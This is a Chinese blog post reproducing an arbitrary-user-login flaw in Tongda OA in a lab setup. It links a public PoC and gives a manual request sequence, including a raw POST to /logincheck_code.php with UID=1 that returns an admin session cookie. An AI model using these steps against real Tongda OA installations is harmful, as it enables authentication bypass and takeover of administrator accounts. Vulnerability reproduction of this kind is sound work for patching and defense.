内容简介:通达OA 2017版通达OA V11.X<V11.5
影响版本
通达OA 2017版
通达OA V11.X<V11.5
环境搭建
安装包来自黑白之道(https://mp.weixin.qq.com/s/moxuMnaqzXg-tZ7_2oLxbQ)
下载安装包后一键安装即可
链接:
https://pan.baidu.com/s/1eel1BxEc0XE4PqlA7y7-Tw
提取码:ilj1
安装过程很简单故不再赘述
漏洞复现
初始用户:admin 密码:空
访问localhost可以看到登陆页面
说明我们环境已经ok了
我们可以先登陆进去,发现管理员后台地址都是如下格式
http://网站/general/index.php?isIE=0&modify_pwd=0
我们可以看到我们直接访问这个网址会显示我们没有登陆
然后我们利用poc生成我们的cookie并进行替换
Poc地址: https://github.com/NS-Sp4ce/TongDaOA-Fake-User
通过poc生成我们的cookie
来到我们之前的那个链接,打开F12进行cookie的替换
替换完之后重新刷新一下
可以看到我们成功的利用cookie登陆了进来
手动复现
访问 /general/login_code.php
获取返回的code_uid 注意注意!!这里要把cookie删除掉不然是无法获得道Set-Cookie 同时 要更换User-Agent!!
Post 发包
CODEUID=上一个数据包的code_uid&UID=1
数据包如下
POST /logincheck_code.php HTTP/1.1 Host: 192.168.1.14 User-Agent: Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) Arora/0.6 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Content-Length: 104 Upgrade-Insecure-Requests: 1 Content-Length: 52 CODEUID={B33EE507-314D-EC90-6258-10D33F800BC9}&UID=1
返回包中的cookie
Set-Cookie: PHPSESSID=0ni6eptuu3595vlfan1aii61v4; path=/
源码分析
后面会补上
以上所述就是小编给大家介绍的《通达OA任意用户登陆漏洞复现》,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对 码农网 的支持!
猜你喜欢:- HQChart 1.9695 版本发布,分时图增加通达信集合竞价图
- 【漏洞复现】WordPress插件Quizlord 2.0 XSS漏洞复现与分析
- Ghost Tunnel复现
- Paxos与“幽灵复现”
- CVE-2010-3333漏洞复现
- CVE-2017-12149漏洞复现
本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。
Machine Learning in Action
Peter Harrington / Manning Publications / 2012-4-19 / GBP 29.99
It's been said that data is the new "dirt"—the raw material from which and on which you build the structures of the modern world. And like dirt, data can seem like a limitless, undifferentiated mass. ......一起来看看 《Machine Learning in Action》 这本书的介绍吧!